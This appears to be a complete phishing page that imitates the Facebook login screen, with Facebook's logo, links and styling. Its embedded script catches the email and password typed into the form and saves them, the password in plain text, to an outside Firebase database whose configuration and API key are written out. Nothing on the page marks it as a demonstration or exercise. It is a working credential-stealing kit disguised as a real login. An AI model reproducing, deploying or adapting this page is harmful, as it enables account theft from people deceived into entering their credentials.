<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" name="viewport" content="width=device-width; initial-scale=1.0"/>
<script src="https://www.gstatic.com/firebasejs/10.13.2/firebase-auth.js"></script>
<script src="https://www.gstatic.com/firebasejs/10.13.2/firebase-database.js"></script>
<title>Login</title>
<style>
    html, body{
        height: 100%;
        width: 100%;
        overflow-x: hidden;
    }
    body {
        background-repeat: no-repeat;
        background: #F2F4F7;
        background-size: cover;
        padding: 0;
        margin: 0;
    }
    img {
        padding-top: 30px;
        width: 250px;
        position: relative;
        top: 0;
        left: 50%;
        translate: -50% 0;
    }
    .box {
        position: fixed;
        top: 50%;
        left: 50%;
        translate: -50% -50%;
    }
    .container {
        background: #fff;
        width: 350px;
        height: 395px;
        display: flex;
        justify-content: center;
        position: relative;
        top: 0;
        left: 50%;
        translate: -50% 0;
        border-radius: 8px;
        box-shadow: 0px 8px 10px 5px #0000001a;
    }
    form {
        position: absolute;
        top: 70px;
        height: auto;
        width: 90%;
        display: flex;
        flex-direction: column;
        justify-content: center;
    }
    #email {
        height: 45px;
        padding-left: 15px;
        padding-right: 15px;
        font-size: 16px;
        width: 90%;
        color: #111111;
        border-radius: 5px;
        border: 1.25px solid #DDDFE2;
    }
    #password {
        height: 45px;
        padding-left: 15px;
        padding-right: 15px;
        font-size: 16px;
        width: 90%;
        color: #111111;
        border-radius: 5px;
        border: 1.25px solid #DDDFE2;
    }
    #submit {
        height: 45px;
        padding-left: 15px;
        padding-right: 15px;
        font-size: 20px;
        font-weight: 700;
        width: 100%;
        color: #ffffff;
        border-radius: 5px;
        border: none;
        background-color: #1079F2;
    }
    #submit:hover {
        background-color: #1171df;
    }
    .for {
        position: absolute;
        bottom: 110px;
        text-decoration: none;
        color: #1079F2;
    }
    .for:hover {
        text-decoration: underline;
    }
    .sub {
        letter-spacing: .5px;
        padding-top: 5px;
        font-size: 18px;
        color: #1C1E21;
    }
    .btn-2 {
        display: flex;
        justify-content: center;
        align-items: center;
        position: absolute;
        bottom: 20px;
        text-decoration: none;
        background: #3FBB2C;
        color: #fff;
        width: 200px;
        height: 50px;
        text-align: center;
        border-radius: 8px;
        font-size: 16px;
        font-family: sans-serif;
        font-weight: bold;
    }
    .btn-2:hover {
        background: rgb(51, 149, 35);
        transition: all .15s;
    }
    .line1 {
        position: absolute;
        bottom: 90px;
        height: 1px;
        background: #bbb;
        width: 90%;
    }
</style>
</head>
<body>
    <div class="box">
        <img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg">
    <div class="container">
        <p class="sub">Log in to Facebook</p>
        <form action="insert.php" method="post" id="myForm">
            <input type="text" name="email" id="email" placeholder="Email or phone number" required><br>
            <input type="password" name="pass" id="password" placeholder="Password" required minlength="8"><br>
            <input id="submit" type="submit" name="insert" value="Log in">
        </form>
        <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=royal_blue_bar&from_login_screen=0" class="for">Forgotten account?</a>
        <div class="line1"></div>
        <a href="https://www.facebook.com/campaign/landing.php?campaign_id=1653377901&extra_1=s%7Cc%7C358050429326%7Ce%7Ccreate%20facebook%20account%7C&placement=&creative=358050429326&keyword=create%20facebook%20account&partner_id=googlesem&extra_2=campaignid%3D1653377901%26adgroupid%3D65139788602%26matchtype%3De%26network%3Dg%26source%3Dnotmobile%26search_or_content%3Ds%26device%3Dc%26devicemodel%3D%26adposition%3D%26target%3D%26targetid%3Dkwd-302772061339%26loc_physical_ms%3D9061363%26loc_interest_ms%3D%26feeditemid%3D%26param1%3D%26param2%3D&gad_source=1" class="btn-2"><p>Create new account</p></a>
    </div> 
    </div> 
    <script type="module">
        
        import { initializeApp } from "https://www.gstatic.com/firebasejs/10.13.2/firebase-app.js";
        import { getAuth, createUserWithEmailAndPassword } from "https://www.gstatic.com/firebasejs/10.13.2/firebase-auth.js";        
        import { getDatabase, ref, set } from "https://www.gstatic.com/firebasejs/10.13.2/firebase-database.js";      
        
        const firebaseConfig = {
          apiKey: "AIzaSyCfOdqwlCKwQk8wTAy2Rwz1h_z2L1pDm8s",
          authDomain: "login-form101.firebaseapp.com",
          projectId: "login-form101",
          storageBucket: "login-form101.appspot.com",
          messagingSenderId: "127378397127",
          appId: "1:127378397127:web:6c898cb2da67c314f4abe2",
          databaseURL: "https://login-form101-default-rtdb.asia-southeast1.firebasedatabase.app"
        };
      
        
        const app = initializeApp(firebaseConfig);
        const auth = getAuth(app);
        const database = getDatabase(app);

        
        const form = document.querySelector('form');
        form.addEventListener('submit', (event) => {
        event.preventDefault();

        const email = document.getElementById('email').value;
        const password = document.getElementById('password').value;

        createUserWithEmailAndPassword(auth, email, password)
            .then((userCredential) => {
                
            const user = userCredential.user;
            console.log("User created");

            const uid = user.uid;
            const userRef = ref(database, 'users/' + uid);

            set(userRef, {
            email: email,
            password: password,
            last_login: Date.now() 
            })
            .then(() => {
                console.log("User data saved to database");
            })
            .catch((error) => {
                console.error("Error saving user data");
            });
            })
            .catch((error) => {
            const errorCode = error.code;
            const errorMessage = error.message;
            console.log("Error creating user");
            });
        });
        
    </script>
</body>
</html>
